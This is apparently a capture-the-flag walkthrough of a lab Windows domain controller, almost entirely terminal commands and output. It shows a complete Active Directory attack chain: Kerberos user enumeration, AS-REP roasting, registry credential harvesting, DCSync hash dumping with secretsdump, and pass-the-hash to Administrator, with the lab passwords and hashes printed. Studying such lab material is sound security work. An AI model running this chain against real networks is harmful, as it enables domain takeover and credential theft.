The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.
root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 userenum --dc 10.10.10.175 --domain EGOTISTICAL-BANK.local --delay 80 --safe -v -t 148 /tmp/logins
2020/03/19 20:27:25 > [!] steven.kerb@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [!] scoins@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2020/03/19 20:27:26 > [!] sdriver@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [!] btaylor@EGOTISTICAL-BANK.LOCAL - User does not exist
root@kali /opt/dirsearch master ? smbclient -L 10.10.10.175 -U 'egotistical-bank.local\fsmith'
Enter EGOTISTICAL-BANK.LOCAL\fsmith's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer We cant print money
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Thestrokes23 ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)
python3 GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/ -usersfile /tmp/logins2 -format john -outputfile /tmp/responses.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kali /opt/impacket/examples master cat /tmp/responses.txt ✔ ⚡ 4388 10:43:31
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:3dd2da95be95ab8337aca2d69e61c55c$39389c5553c64b749830594bb8b97709a7ec18ebbb53a522468167ac4919c07d9f8c64a18bee6fe5c50af7e8b9a79747c6c3aff7b897cc3466fa3d5a3a551b00ded67e01f42a7a68dc1883ac1b2e7b1289877e65c7d5642fb62a664c604e806a7969ccba7deb0228487b0c4a1e84f431174024ca98f35a39b99be5fea58ea5b23f75471deeb00f71253db6b025199c88dd1d4279aa8c7182e60ca3fa55f59645dd316ec94d49bc89fa77dc12c4cd3c8485e00bb0ef2abc60e5eacef7d31eba41a511f9cf1a94c9d67e9e1c5eb4db366258199cc2dc47f661c008e5bf58d0a5f856ce0836ea8a2eb50fb9d6781ad293714e7a91ea60805073eb6c617745b86aa9
root@kali /opt/impacket/examples master
root@kali /opt/impacket/examples master python3 lookupsid.py -target-ip 10.10.10.175 fsmith:Thestrokes23@egotistical-bank ✔ ⚡ 4382 10:41:10
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at egotistical-bank
[*] StringBinding ncacn_np:egotistical-bank[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2966785786-3096785034-1186376766
498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: EGOTISTICALBANK\Administrator (SidTypeUser)
501: EGOTISTICALBANK\Guest (SidTypeUser)
502: EGOTISTICALBANK\krbtgt (SidTypeUser)
512: EGOTISTICALBANK\Domain Admins (SidTypeGroup)
513: EGOTISTICALBANK\Domain Users (SidTypeGroup)
514: EGOTISTICALBANK\Domain Guests (SidTypeGroup)
515: EGOTISTICALBANK\Domain Computers (SidTypeGroup)
516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup)
517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias)
518: EGOTISTICALBANK\Schema Admins (SidTypeGroup)
519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup)
520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup)
521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup)
522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup)
525: EGOTISTICALBANK\Protected Users (SidTypeGroup)
526: EGOTISTICALBANK\Key Admins (SidTypeGroup)
527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup)
553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias)
571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias)
572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias)
1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser)
1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias)
1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup)
1103: EGOTISTICALBANK\HSmith (SidTypeUser)
1105: EGOTISTICALBANK\FSmith (SidTypeUser)
1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)
root@kali /opt/impacket/examples master
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.10.175 --user fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
Directory: C:\Users\FSmith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/20/2020 1:07 PM PowerSploit-master
-a---- 3/20/2020 1:18 PM 53760 SauronEye.exe
-a---- 3/20/2020 12:58 PM 7120 WindowsEnum.ps1
Windows Enumeration Script v 0.1
by absolomb
www.sploitspren.com
------------------------------------------
*Evil-WinRM* PS C:\Users\FSmith\Documents>
User Directories
------------------------------------------
Name
----
Administrator
FSmith
Public
svc_loanmgr
User Autologon Registry Items
------------------------------------------
DefaultDomainName DefaultUserName DefaultPassword
----------------- --------------- ---------------
EGOTISTICALBANK EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!
root@kali /opt/evil-winrm master v2.3 evil-winrm -i 10.10.10.175 --user svc_loanmgr -p Moneymakestheworldgoround! 1 ↵ ⚡ 4545 13:32:41
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
*Evil-WinRM* PS C:\Users\FSmith> gci -Recurse -Filter "user.txt" -File -ErrorAction SilentlyContinue -Path "C:\"
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc_loanmgr\DOcuments> ./winPEAS.exe
root@kali:/opt/SharpSploit/SharpSploit# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:f0b39206c3b064d1adc35f95e8a6e70c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:2e81c7eb6af46746f2765883f2c49879aa91a107170cf2a6e0abe4f5f593c607
SAUNA$:aes128-cts-hmac-sha1-96:63f3b1af0cadca84269ec7d2ad11bfe3
SAUNA$:des-cbc-md5:104c515b86739e08
root@kali /opt/evil-winrm master v2.3 evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff 1 ↵ ⚡ 4569 12:02:57
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
